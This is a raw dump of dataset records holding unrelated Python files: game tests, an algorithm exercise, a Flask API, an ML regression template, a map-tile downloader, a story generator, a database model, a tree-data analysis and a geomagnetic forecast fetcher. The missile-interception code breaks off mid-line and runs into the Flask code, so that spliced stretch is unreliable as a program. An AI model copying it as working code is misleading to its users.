テスト\n\ndef test_observation():\n env = RockPaperScissorsEnv(Player())\n assert(len(env.observation)==100)\n assert(len(env.observation[0])==2)\n for i in range(100):\n assert(env.observation[i][0] >= 0 and env.observation[i][0]<=2)\n assert(env.observation[i][1] >= 0 and env.observation[i][1]<=2)\n oldest_policy_action = env.observation[1][0]\n oldest_env_action = env.observation[1][1]\n newest_policy_action = 3\n newest_env_action = 4\n env.update_observation(env.observation, newest_policy_action, newest_env_action)\n assert(env.observation[0][0]==oldest_policy_action)\n assert(env.observation[0][1]==oldest_env_action)\n assert(env.observation[99][0]==newest_policy_action)\n assert(env.observation[99][1]==newest_env_action)\n\ndef test_is_done():\n env = RockPaperScissorsEnv(Player())\n assert(env.is_done(0, 0) == False)\n assert(env.is_done(0, 1) == True)\n assert(env.is_done(0, 2) == True)\n assert(env.is_done(1, 0) == True)\n assert(env.is_done(1, 1) == False)\n assert(env.is_done(1, 2) == True)\n assert(env.is_done(2, 0) == True)\n assert(env.is_done(2, 1) == True)\n assert(env.is_done(2, 2) == False)\n\ndef test_calc_reward():\n env = RockPaperScissorsEnv(Player())\n for i in range(3):\n assert(env.calc_reward(i, i)==-1)\n assert(env.calc_reward(0, 1)==-10)\n assert(env.calc_reward(0, 2)==10)\n assert(env.calc_reward(1, 0)==10)\n assert(env.calc_reward(1, 2)==-10)\n assert(env.calc_reward(2, 0)==-10)\n assert(env.calc_reward(2, 1)==10)\n\ndef test_player():\n player = Player()\n prob_player = ProbPlayer(prob_list=[1, 7, 2])\n prob_player_pa = ProbPlayer(prob_list=[0.0, 1.0, 0.0])\n jurina_player = JurinaPlayer(action=1)\n for _ in range(100):\n assert(player.predict(None) in [0, 1, 2])\n assert(prob_player.predict(None) in [0, 1, 2])\n assert(prob_player_pa.predict(None)==1)\n assert(jurina_player.predict(None)==1)\n\ndef test_reset():\n env = RockPaperScissorsEnv(ProbPlayer())\n for _ in range(100):\n assert(env.reset() == env.observation)\n\nif __name__ == '__main__':\n test_observation()\n test_is_done()\n test_calc_reward()\n test_player()\n test_reset()\n","repo_name":"coolerking/rock-paper-scissors","sub_path":"envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":14823,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1831662746","text":"# prog dyn en O(n^2)\n# on garde la solution optimale pour 1, 2, ... 
n missiles\n# si un missile peut s'inserer derriere le missile n et que sa hauteur est supérieure a la solution actuelle a n+1 missiles,\n# alors on a un nouveau optimum pour n+1 missiles.\n\n\nimport sys\n\nflag = False\nopt = []\nit=0\nwhile True:\n\tline = sys.stdin.readline()\n\tx = int(line)\n\tif x == -1 :\n\t\tif not flag:\n\t\t\tbreak;\n\t\telse:\n\t\t\tit+=1\n\t\t\tif(it!=1):\n\t\t\t\tprint()\n\t\t\tmaximum = str(len(opt))\n\t\t\tprint('Test #'+str(it)+':')\n\t\t\tif maximum != 0:\n\t\t\t\tprint(' maximum possible interceptions: '+str(len(opt)))\n\t\t\telse:\n\t\t\t\tprint('')\n\t\t\topt = []\n\t\t\tflag = False\n\telse:\n\t\tflag = True\n\t\tif len(opt)==0:\n\t\t\topt.append(x)\n\t\telse:\n\t\t\tfor i in reversed(range(len(opt))):\n\t\t\t\tval = opt[i]\n\t\t\t\tif(val>=x):\n\t\t\t\t\tif(i\", methods=[\"GET\"])\ndef get_character_by_id(id):\n response = fetch_one_character(id)\n if response:\n return jsonify(response.dict())\n return jsonify({\"error\": f\"There is no character with the id {id}\"}), 404\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5050)\n","repo_name":"DennisDemir24/thesis-projects","sub_path":"python/flask-rest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13471967867","text":"# This serves as a template which will guide you through the implementation of this task. It is advised\n# to first read the whole template and get a sense of the overall structure of the code\n# First, we import necessary libraries:\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import DotProduct, RBF, Matern, RationalQuadratic, ExpSineSquared\nfrom sklearn.kernel_approximation import PolynomialCountSketch\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef data_loading():\n \"\"\"\n This function loads the training and test data, preprocesses it, removes the NaN values and interpolates the missing\n data using imputation\n\n Parameters\n ----------\n Returns\n ----------\n X_train: matrix of floats, training input with features\n y_train: array of floats, training output with labels\n X_test: matrix of floats: dim = (100, ?), test input with features\n \"\"\"\n # Load training data\n train_df = pd.read_csv(\"P2/train.csv\")\n\n # print(\"Training data:\")\n # print(\"Shape:\", train_df.shape)\n # print(train_df.head(2))\n # print('\\n')\n\n # Load test data\n test_df = pd.read_csv(\"P2/test.csv\")\n\n # print(\"Test data:\")\n # print(test_df.shape)\n # print(test_df.head(2))\n\n # # Dummy initialization of the X_train, X_test and y_train\n # X_train = np.zeros_like(train_df.drop(['price_CHF'], axis=1))\n # y_train = np.zeros_like(train_df['price_CHF'])\n # X_test = np.zeros_like(test_df)\n\n # print(train_df)\n\n # Perform data preprocessing, imputation and extract X_train, y_train and X_test using mean values\n\n # Use interpolation for missing values. Interpolate cannot handle missing starting or end values. 
So fill these up with mean()\n\n # Why does this not work with RBF?\n\n ### Training set\n\n new_train_df = train_df.interpolate(method=\"akima\")\n new_train_df = new_train_df.fillna(train_df.mean())\n\n # Encode season data\n\n binary_version_seasons = pd.get_dummies(new_train_df['season'])\n new_train_df = new_train_df.drop(columns=['season']).join(binary_version_seasons)\n\n y_train = new_train_df[\"price_CHF\"].to_numpy()\n X_train = new_train_df.drop(columns=[\"price_CHF\"]).to_numpy()\n\n ### Test set\n\n new_test_df = test_df.interpolate(method=\"akima\")\n new_test_df = new_test_df.fillna(new_test_df.mean())\n\n # Encode season data\n\n new_test_df = new_test_df.drop(columns=['season']).join(binary_version_seasons)\n\n X_test = new_test_df.to_numpy()\n\n # Use sklearn imputation\n\n # new_df = train_df.fillna(train_df.mean())\n # y_train = new_df[\"price_CHF\"].to_numpy()\n # X_train = new_df.drop(columns=[\"price_CHF\"]).to_numpy()\n\n # new_test_df = test_df.fillna(test_df.mean())\n # X_test = new_test_df.to_numpy()\n\n print(new_train_df.head())\n print(new_test_df.head())\n\n\n\n assert (X_train.shape[1] == X_test.shape[1]) and (X_train.shape[0] == y_train.shape[0]) and (\n X_test.shape[0] == 100), \"Invalid data shape\"\n return X_train, y_train, X_test\n\n\ndef calculate_R2(y_pred, y):\n\n R2 = r2_score(y, y_pred)\n\n assert np.isscalar(R2)\n return R2\n\n\ndef calculate_RMSE(y_pred, y):\n \"\"\"This function takes test data points (X and y), and computes the empirical RMSE of\n predicting y from X using a linear model with weights w.\n\n Parameters\n ----------\n y_pred: array of floats\n y: array of floats, dim = (15,), input labels\n\n Returns\n ----------\n RMSE: float: dim = 1, RMSE value\n \"\"\"\n\n # Determine mean squared error\n RMSE = mean_squared_error(y, y_pred) ** 0.5\n\n assert np.isscalar(RMSE)\n return RMSE\n\n\ndef modeling_and_prediction(X_train, y_train, X_test):\n \"\"\"\n This function defines the model, fits training data and then does the prediction with the test data\n\n Parameters\n ----------\n X_train: matrix of floats, training input with 10 features\n y_train: array of floats, training output\n X_test: matrix of floats: dim = (100, ?), test input with 10 features\n\n Returns\n ----------\n y_test: array of floats: dim = (100,), predictions on test set\n \"\"\"\n\n # Create storage array for predicted y values\n y_pred1 = np.zeros(X_test.shape[0])\n\n # Leave out seasons data\n # X_train = X_train[:, 1:]\n\n # Define final test data\n X_test1 = X_test\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n '''\n gpr = GaussianProcessRegressor(kernel=DotProduct())\n gpr.fit(X_train[:,1:], y_train)\n '''\n\n # Storage array for RMSE values\n RMSE_mat = np.zeros(9)\n R2_mat = np.zeros(9)\n\n # Define n_fold cross validation\n kf = KFold(9)\n mat_i = 0\n\n # Storage for all n_fold models\n models = []\n\n # Perform Cross validation\n for train_index, test_index in kf.split(X_train):\n X_train_folds = X_train[train_index]\n y_train_folds = y_train[train_index]\n\n gpr = GaussianProcessRegressor(kernel=DotProduct())\n gpr.fit(X_train_folds, y_train_folds)\n\n X_test = X_train[test_index]\n y_test = y_train[test_index]\n\n y_pred, sigma = gpr.predict(X_test, return_std=True)\n\n # print(sigma)\n\n models.append(gpr)\n\n RMSE_mat[mat_i] = calculate_RMSE(y_pred, y_test)\n R2_mat[mat_i] = calculate_R2(y_pred, y_test)\n\n mat_i = mat_i + 1\n\n print(RMSE_mat)\n print(R2_mat)\n\n # Determine best model\n best_index_RMSE = np.argmin(RMSE_mat)\n 
best_index_R2 = np.argmin(R2_mat)\n\n final_gpr_RMSE = models[best_index_RMSE]\n final_gpr_R2 = models[best_index_R2]\n\n # y_pred = final_gpr_RMSE.predict(X_test1[:, 1:])\n y_pred = final_gpr_R2.predict(X_test1[:, :])\n\n\n # print(gpr.score(X_train[:,1:], y_train))\n\n '''\n ps = PolynomialCountSketch(degree=3, random_state=1)\n X_features = ps.fit_transform(X)\n #print(np.exp(X_train[5,1]))\n '''\n # plt.plot(np.exp(X_train[:,1]),np.exp(y_train),'.')\n\n assert y_pred.shape == (100,), \"Invalid data shape\"\n return y_pred\n\n\n# Main function. You don't have to change this\nif __name__ == \"__main__\":\n # Data loaditaFrame(y_png\n X_train, y_train, X_test = data_loading()\n # The function retrieving optimal LR parameters\n y_pred = modeling_and_prediction(X_train, y_train, X_test)\n # Save results in the required format\n\n dt = pd.DataFrame(y_pred)\n\n dt.columns = ['price_CHF']\n print(dt.head(5))\n dt.to_csv('P2/results.csv', index=False)\n print(\"\\nResults file successfully generated!\")\n","repo_name":"IML666/IML-2023","sub_path":"P2/Approaches/template_solution.py","file_name":"template_solution.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16016931141","text":"import urllib.request\nimport os \n\ndef download(x,y,z):\n x = str(x)\n y = str(y)\n z = str(z)\n directory = \"map/\"+x+\"/\"+y+\"/\"\n img = z+\".png\"\n if os.path.isfile(directory+img): return\n if not os.path.exists(directory): os.makedirs(directory)\n\n urllib.request.urlretrieve(\"https://c.tile.openstreetmap.se/hydda/base/\"+x+\"/\"+y+\"/\"+z+\".png\", directory+img)\n print(\"Downloaded \"+directory+img)\n\ndef downloadAll(zoom, centerX, centerY, radius):\n for x in range(centerX-radius,centerX+radius): # Left/Right 247,350\n for y in range(centerY-radius, centerY+radius): # Left/Right 170,200\n download(zoom, x, y)\n\nradius = 20\ndownloadAll(12, 2100, 1420, radius)\ndownloadAll(11, 1060, 715, radius)\ndownloadAll(10, 525, 355, radius)\ndownloadAll(9, 300, 180, radius)\n\n\n","repo_name":"Quesstor/Browsergame","sub_path":"Browsergame/Server/WebServer/static/map/scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73953858401","text":"\n############################################################################\n################## narrative Generator - Joseph Grimer 2016 ####################\n############################################################################\n\n'''\n\njust having fun here... future functionlity\n- currently everything in past tense... and conjugations haven't kicked in.\n- make story a local object passed around?\n\nTwo defining principles of generated narrative interaction:\ngolden rule: love thy neighbour as thyself?\nsilver rule??\n'''\n\n#from vocabulary import * #importa all vocab vars\n\n### main functions\n\n\ndef main():\n\n\tprint(\"Welcome to narrativeGen... 
Your Personal narrative Generator\")\n\t\n\tpromptForSeed()\n\n\temotionDrivennarrative3()\n\tstory.recount()\n\ndef emotionDrivennarrative3():\n\n\tstory.addPeople2(2)\n\tstory.describePeople()\n\t\n\tstory.blankLine()\n\t\n#\tnarrative begins:\n\tstory.people[0].actOn(story.people[1])\n\tstory.people[1].feel()\n\n\tstory.blankLine() # note: alpha is not affected (yet)\n\n\tfor i in range(1,4):\n\t\tif developnarrative(story.people) == False: # ergo: if the narrative didn't develop\n\t\t\tstory.state([\"-------The Natural End of the narrative-------\"])\n\t\t\tbreak\n\t\tstory.blankLine()\n\t\n\tstory.state([\"---------- Epilogue:\"])\n\t\n\tfor each in story.people:\n\t\teach.feel()\n\ndef developnarrative(people): #ary\n\tunsettled=False\n\tfor person in people:\n\t\tif person.feelingNo!=0 and person.feelingNo>=-12: #if a person is normal and not (emotionally) dead\n#\t\t\tstory.state([str(person.feelingNo),\"should be not zero and higher than -13\"])\n\t\t\tfor otherPerson in people:\n\t\t\t\t### possible addition to below: person.feelingNo!=0\n\t\t\t\tif otherPerson.feelingNo>=-12 and person!=otherPerson:## i.e. if person is alive and not me\n#\t\t\t\t\tstory.state([\"otherPersonFeels\",str(otherPerson.feelingNo<-12)])\n\t\t\t\t\tperson.actOn(otherPerson)\n\t\t\t\t\totherPerson.feel()\n\t\t\t\t\tbreak # I've made somebody feel... no need to make the whole world go bonkers!\n\t\t\tunsettled=True\n\treturn unsettled\n\n######################### Global Variables: ##############################\n\nhumanNaturalPowers=[\n#[\"saved\",+5],\n#[\"inspired\",+4],\n##[\"listened to\",+3],\n#[\"read a narrative to\",+3],\n#[\"complemented\",+2],\n#[\"sympathised with\",+2],\n##[\"played a game with\",+2],\n[\"greeted\",+1],\n[\"surprised\",+1],\n[\"smiled at\",+1],\n[\"wished well\",+1],\n[\"waved to\",+1],\n[\"looked at\",+1],\n[\"looked past\",-1],\n[\"turned away from\",-1],\n[\"ignored\",-1],\n[\"said goodbye to\",-1],\n[\"scared\",-1],\n[\"frowned at\",-1],\n#[\"didn't sympathise with\",-2],\n#[\"insulted\",-2],\n#[\"shouted at\",-3],\n#[\"stood on\",-4],\n#[\"captured\",-5]\n##[\"murdered\",-100], ## DISABLED... 
Causing too many killings!\n]\n#[\"\",],\n\n#\t\tself.title=oneOf([\"builder\",\"assasin\",\"juggler\",\"programmer\",\"musician\",\"tailor\",\"seamstress\",\"cook\",\"salesman\"])\nprofessions=[\n[ \"assasin\",[[\"shot at\",-6],[\"shot\",-100],[\"threatened\",-4],[\"aimed at\",0],[\"fell in love with\",+12]] ],\n[ \"cook\",[[\"baked a cake for\",+3],[\"made a tea for\",+1],[\"made a coffee for\",+2],[\"made dinner for\",+2]] ],\n[ \"fairy\",[[\"blessed\",+3],[\"gave fairy dust to\",+6],[\"appeared to\",+1],[\"cursed\",-4]] ],\n[ \"woodcutter\",[[\"grunted at\",+1],[\"burped at\",-2],[\"threw an axe at\",-2],[\"tried to chop\",-4],[\"gave a tree to\",+2]] ],\n[ \"loner\",[[\"cried to\",-3],[\"gave a flower to\",+4],[\"stole from\",-3],[\"slept near\",-3],[\"begged\",-1],[\"played music to\",+1]] ],\n#[ \"\",[[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+]]],\n#[ \"builder\",[[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+],[\"\",+]] ],\n[ \"orphan\",[[\"asked paternal advice from\",-2],[\"glared at\",-2],[\"hugged\",+4],[\"felt for\",0]] ]\n]\n\n################################### Classes ############################################\n\nclass narrative:\n\tdef __init__(self): # (self,name)\n\t\tself.title=\"A story of Woe\"\n\t\tself.lines = []\n\t\tself.people= []\n\tdef addPeople(self,ary):\n#\t\tfor each in ary:\n\t\tself.people.extend(ary)\n#\t\t\teach=person() #declare them in here??\n\tdef addPeople2(self,number=1):\n\t\tfor each in range(0,number):\n\t\t\tnewPerson=person()\n\t\t\tself.people.append(newPerson)\n\tdef describePeople(self):\n\t\tfor person in self.people:\n\t\t\tperson.describe()\n\tdef state(self,ary):\n\t\tstring=ary[0].capitalize()\n\t\tfor word in ary[1:]:\n\t\t\tif word != \"\":\n\t\t\t\tstring+=\" \" + word\n\t\tstring+=\". \\n\"\n\t\tself.lines.append(string)\n\tdef recount(self):\n\t\tprint(self.title + \"\\n---\")\n\t\tprint(\"\".join(self.lines))\n\tdef blankLine(self):\n\t\tself.lines.append(\"\\n\")\n\n#\t\tself.title=oneOf([\"builder\",\"assasin\",\"juggler\",\"programmer\",\"musician\",\"tailor\",\"seamstress\",\"cook\",\"salesman\"])\nclass profession: # template:Assassin\n\tdef __init__(self): # (self,name)\n\t\tjob=oneOf(professions)\n\t\tself.title=job[0]\n#\t\tprint(self.title)\n\t\tself.description=\"unfinished\"\n\t\tself.powers=job[1] # articial verbs/abilities\n#\t\tprint(self.powers)\n\t\tself.feelingNo=0\n\tdef describe(self):\n#\t\tprint \"aoranisReturning>\"+aOrAn(self.title)\n\t\tstory.state([self.title,self.description])\n\nclass person:\n\tdef __init__(self): # (self,name)\n\t\tself.name=getName()\n\t\tself.powers=humanNaturalPowers # natural verbs/abilities\n\t\tself.job=profession()\n#\t\tself.powers.extend(self.job.powers) # TEMPORARY: DISABLED JOBS\n\t\tself.title=self.job.title\n\t\tself.feelingNo=0\n\t\t\n\tdef describe(self):\n#\t\tprint \"aoranisReturning>\"+aOrAn(self.title)\n\t\tstory.state([self.name,\"was\",aOrAn([self.title])])\n\tdef actOn(self,other):\n\t\taction = oneOf(list(self.powers))\n\t\tstory.state([self.name,action[0],other.name])\n\t\tother.feelingNo += action[1]\n\tdef feel(self):\n\t\t### feelings for others are negative. 
feelings for self are positive\n#\t\tstory.state([str(self.feelingNo)])\n\t\tif self.feelingNo>24:\n\t\t\tfeelings=\"dead from self\"\n\t\tif self.feelingNo>12:\n\t\t\tfeelings=\"blinded by selfishness\"\n\t\telif self.feelingNo>8:\n\t\t\tfeelings=\"very selfish\"\n\t\telif self.feelingNo>6:\n\t\t\tfeelings=\"selfish\"\n\t\telif self.feelingNo>2:\n\t\t\tfeelings=\"self-centered\"\n\t\telif self.feelingNo>0:\n\t\t\tfeelings=\"self-aware\"\n\t\telif self.feelingNo==0:\n\t\t\tfeelings=\"good\"\n\t\telif self.feelingNo>-2:\n\t\t\tfeelings=\"small\"\n\t\telif self.feelingNo>-2:\n\t\t\tfeelings=\"very small\"\n\t\telif self.feelingNo>-6:\n\t\t\tfeelings=\"tiny\"\n\t\telif self.feelingNo>-8:\n\t\t\tfeelings=\"streteched\"\n\t\telif self.feelingNo>-12:\n\t\t\tfeelings=\"crushed\"\n\t\telif self.feelingNo>-24:\n\t\t\tfeelings=\"absolutely crushed\"\n\t\telse:\n\t\t\tfeelings=\"dead from others\"\n\t\tstory.state([self.name,\"felt\",feelings])\n\n########################### other functions #################################\n\n\n\n\n################ grammar and spelling related functions ########### \n\ndef aOrAn(words): # still need to fix spaces problem\n#\tprint(words)\n\tfor word in words:\n\t\tif word==\"\":\n\t\t\tcontinue\n\t\telif word[0].lower() in [\"a\",\"e\",\"i\",\"o\",\"u\"]:\n\t\t\treturn \"an \" + \" \".join(words)\n\t\telse:\n\t\t\treturn \"a \" + \" \".join(words)\n\nnames=[\"Jim\",\"Karl\",\"Pharaoah\",\"Queenie\",\"Marty\",\"Doctor Brown\",\"Empressette\",\"Proffessor Plum\",\"Wifty\",\"Beefy\",\"Bobert\",\"Maxwell\",\"Denvod\",\"Clix\",\"Amias the Third\",\"Bobiatas\"]\ndef getName(): # fairly ### doesn't work if you use everybody!\n#\tforenames=[\"Jon\",\"Jim\",\"Karl\"] ### add this functionality later\n\tglobal names\n\trandomNameNo = oneIn(len(names))\n\trandomName = names[randomNameNo]\n\tdel names[randomNameNo] #removing element from list so we don't get repeats in the narrative\n\treturn randomName\n\n################ randomisers ###############################\n\nseeds = [] # string based randomiser setup\nlastSeed = -1\n\ndef promptForSeed():\n\n\tprint(\"Please input your chosen narrative number randomiser\")\n\tseedStr = raw_input(\"> \") # this is a random sit on the keyboard string\n\tglobal seeds\n\tglobal lastSeed\n\n#\t#failsafe\n\tif seedStr == \"\":\n\t seedStr = \"sjonwmuzla[423534634576\"\n\n\t#prepare randomiser\n\tfor char in seedStr:\n\t\tseeds.append(ord(char))\n\ndef aSeed():\n\tglobal seeds\n\tglobal lastSeed\n\tlastSeed += 1\n\tif lastSeed >= len(seeds):\n\t\tlastSeed = 0\n\tseeds[lastSeed]+=59\n\treturn seeds[lastSeed]\n\ndef oneOf(ary,prob=1): # uses aSeed, and returns a no\n\tif aSeed()%prob == 0:\n\t\treturn ary[aSeed()%(len(ary)-1)]\n\telse:\n\t\treturn \"\"\n\ndef oneIn(max):\n\treturn ((aSeed()+aSeed()+aSeed()+aSeed()+aSeed())%max) # 400-800?\n\n### run main\n\nstory = narrative()\n\nmain()\n\n######################### old functions ########################################\n'''\n\n'''\n\n\n","repo_name":"joegrimer/joegrimer.github.io","sub_path":"wordy/Story Generator/Revision0/storyGen4.py","file_name":"storyGen4.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10927868151","text":"#-*- coding: UTF-8 -*-\nimport functools\n\nclass Solution(object):\n def largestNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: str\n \"\"\"\n nums = [str(i) for i in nums]\n comp = lambda a,b : 1 if a+b>b+a else -1 if a+b 0:\n return data\n 
else:\n return []\n\n def get_FormValues_byForm_and_Field_and_Value(self, id_form,field,value):\n if isinstance(value, list):\n data = self.store.find(ModelsFormValues, ModelsFormValues.fields==field,\n ModelsFormValues.value.is_in(value)) #.one()\n\n else:\n data = self.store.find(ModelsFormValues, ModelsFormValues.fields==field,\n ModelsFormValues.value==value) #.one()\n\n if id_form != 0:\n data = data.find(forms_id=id_form)\n\n \n return data\n\n\n\n def get_FormValues_byForm_and_Instance(self, id_form, id_instance):\n data = self.store.find(ModelsFormValues, ModelsFormValues.forms_id==id_form,\n ModelsFormValues.instance_id==id_instance)\n if data.count()>0:\n return data\n else:\n return []\n\n def get_FormValues_byForm(self, id_form):\n data = self.store.find(ModelsFormValues, ModelsFormValues.forms_id==id_form)\n if data.count()>0:\n return data\n else:\n return []\n #retorna todas as mudanças que teve no valor de um field\n def get_logField(self,):\n data = ModelsFormValues().store.find(ModelsLog, ModelsLog.forms_id==self.forms_id,\n ModelsLog.instance_id==self.instance_id,\n ModelsLog.fields==self.fields).order_by(ModelsLog.date_creation)\n return data\n","repo_name":"vindula/vindula.contentcore","sub_path":"vindula/contentcore/models/form_values.py","file_name":"form_values.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5780641985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 18 23:00:20 2020.\n\n@author: Martin\n\"\"\"\n\nimport csv\nfrom collections import Counter\n\n#%%\ndef leer_parque(archivo, parque):\n \"\"\"Lee el archivo y devuelve los arboles del parque.\"\"\"\n rta = []\n with open(archivo, \"r\", encoding = \"utf8\") as arboles:\n rows = csv.reader(arboles)\n headers = next(rows)\n for row in rows:\n if row[10] == parque:\n pos = dict(zip(headers,row))\n rta.append(pos)\n return rta\n\n#%%\ndef especies(lista_arboles):\n rta = []\n for row in lista_arboles:\n rta.append(row[\"nombre_com\"])\n rta = set(rta) \n return rta\n\n#%%\ndef contar_ejemplares(lista_arboles):\n contador = Counter()\n for row in lista_arboles:\n contador[row[\"nombre_com\"]] += 1\n return contador\n#%%\narbolParque1 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"GENERAL PAZ\")\narbolParque2 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"ANDES, LOS\")\narbolParque3 = leer_parque(\"arbolado-en-espacios-verdes.csv\", \"CENTENARIO\")\n\ncomunes1 = contar_ejemplares(arbolParque1).most_common(5)\ncomunes2 = contar_ejemplares(arbolParque2).most_common(5)\ncomunes3 = contar_ejemplares(arbolParque3).most_common(5)\n\n#%%\ndef obtener_altura(lista_arboles, especie):\n rta = []\n for row in lista_arboles:\n if row[\"nombre_com\"] == especie:\n rta.append(float(row[\"altura_tot\"]))\n return rta\n\n\n#%%\nalt1 = obtener_altura(arbolParque1, \"Jacarandá\")\nalt2 = obtener_altura(arbolParque2, \"Jacarandá\")\nalt3 = obtener_altura(arbolParque3, \"Jacarandá\")\n\nmax1 = max(alt1)\nmax2 = max(alt2)\nmax3 = max(alt3)\nprom1 = sum(alt1)/len(alt1)\nprom2 = sum(alt2)/len(alt2)\nprom3 = sum(alt3)/len(alt3)\n\n#%%\ndef obtener_inclinaciones(lista_arboles, especie):\n rta = []\n for row in lista_arboles:\n if row[\"nombre_com\"] == especie:\n rta.append(float(row[\"inclinacio\"]))\n return rta\n\n#%%\ndef especimen_mas_inclinado(lista_arboles):\n rta = [\"\",0]\n esps = especies(lista_arboles)\n for esp in esps:\n maxIncl = max(obtener_inclinaciones(lista_arboles, esp))\n if rta[1] < 
maxIncl:\n rta[0] = esp\n rta[1] = maxIncl\n return rta\n#%%\nmaxIncl1 = especimen_mas_inclinado(arbolParque1)\nmaxIncl2 = especimen_mas_inclinado(arbolParque2)\nmaxIncl3 = especimen_mas_inclinado(arbolParque3)\n\n#%%\ndef especie_promedio_mas_inclinada(lista_arboles):\n rta = [\"\",0]\n esps = especies(lista_arboles)\n for esp in esps:\n promIncl = sum(obtener_inclinaciones(lista_arboles, esp))/len(obtener_inclinaciones(lista_arboles, esp))\n if rta[1] < promIncl:\n rta[0] = esp\n rta[1] = promIncl\n return rta\n\npromMax = especie_promedio_mas_inclinada(arbolParque2)\n\n\n\n\n\n\n\n\n\n","repo_name":"ccollado7/UNSAM---Python","sub_path":"Revision de Pares/Semana N°2/Caso 1/02-2-tin-arboles.py-mar-2020-08-19_13.29.32.py","file_name":"02-2-tin-arboles.py-mar-2020-08-19_13.29.32.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1923685021","text":"__contact__ = 'Josef Koller, jkoller@lanl.gov'\n\nimport datetime\ntry:\n import urllib2 as u\nexcept ImportError:\n import urllib.request as u\n\nimport spacepy.datamodel as dm\nimport dateutil.parser as dup\n\n\n\n# -------------------------------------\ndef now():\n \"\"\"\n Return the current values for the parameters\n\n Returns\n -------\n out : datamodel.SpaceData\n A SpaceData containing the current values of the indices\n \"\"\"\n raise(NotImplementedError('Not yet implemented (nudge nudge)'))\n\n\n# -------------------------------------\t\ndef nextForecast():\n \"\"\"\n Return only the next value\n \n Returns\n -------\n out : datamodel.SpaceData\n A SpaceData containing the next forcast for the indices\n \"\"\"\n dd = forecast()\n data = dm.SpaceData()\n data.attrs = dd.attrs\n data['forecast_hours'] = [1,3]\n data['AE'] = [dd['AE_1hr'][-1], dd['AE_3hr'][-1]]\n data['Kp'] = [dd['Kp_1hr'][-1], dd['Kp_3hr'][-1]]\n data['Dst'] = [dd['Dst_1hr'][-1], dd['Dst_3hr'][-1]]\n data['Calc'] = [dd['Calc_1hr'][-1], dd['Calc_3hr'][-1]]\n data['Epoch'] = [dd['Epoch_1hr'][-1], dd['Epoch_3hr'][-1]]\n return data\n\n\ndef _parseRICE(data, hours):\n \"\"\"\n parse the data read form the Rice website\n \n .. 
warning: This is an internal function do not call directly\n\n Parameters\n ----------\n data : list\n data from the Rice website\n hours : str\n the forecast hours, used int h dict keys\n \n Returns\n -------\n out : datamodel.SpaceData\n datemnodel object of the parsed data\n \n \"\"\"\n dd = dm.SpaceData()\n # strip the newlines\n data = [val.rstrip() for val in data]\n header = data.pop(0) # grab the header\n header = header.split()[4:]\n units = []\n for i, val in enumerate(header):\n if '(' in val:\n val = val.split('(')\n units.append(val[-1].split(')')[0])\n header[i] = val[0]\n else:\n units.append(None)\n data = dm.dmarray([val.split() for val in data])\n times = dm.dmarray([dup.parse('{0}{1:02d}{2:02d}T{3:04d}'.format(val[0], int(val[1]), int(val[2]), int(val[3]))) for val in data[:, 0:4]])\n data = dm.dmarray(data[:,4:], dtype=float)\n for i, (key, unit) in enumerate(zip(header, units)):\n dd[key+'_' + hours + 'hr'] = dm.dmarray(data[:,i], attrs={'units':unit})\n dd['Calc_' + hours + 'hr'] = times\n dd['Epoch_' + hours + 'hr'] = dd['Calc_' + hours + 'hr'] + datetime.timedelta(hours=int(hours))\n return dd\n\n\ndef forecast():\n RICE_URL_1_last = 'http://mms.rice.edu/realtime/Predictions_1.last'\n RICE_URL_3_last = 'http://mms.rice.edu/realtime/Predictions_3.last'\n RICE_Boyle_all = 'http://mms.rice.edu/realtime/File1.txt'\n RICE_1hr_Kp_Dst = 'http://mms.rice.edu/realtime/File2.txt'\n RICE_3hr_Kp_Dst = 'http://mms.rice.edu/realtime/File3.txt'\n\n # grab all the 1 hour data\n hr1 = u.urlopen(RICE_1hr_Kp_Dst)\n data = hr1.readlines()\n hr1.close()\n dd1 = _parseRICE(data, '1')\n\n # grab all the 3 hour data\n hr3 = u.urlopen(RICE_3hr_Kp_Dst)\n data = hr3.readlines()\n hr3.close()\n dd3 = _parseRICE(data, '3')\n\n dd = dm.SpaceData()\n dd.attrs['URL_1hr'] = RICE_1hr_Kp_Dst\n dd.attrs['URL_3hr'] = RICE_3hr_Kp_Dst\n dd.attrs['retrive_time'] = datetime.datetime.now()\n \n for key1, key3 in zip(dd1, dd3):\n dd[key1] = dd1[key1]\n dd[key3] = dd3[key3]\n \n return dd\n 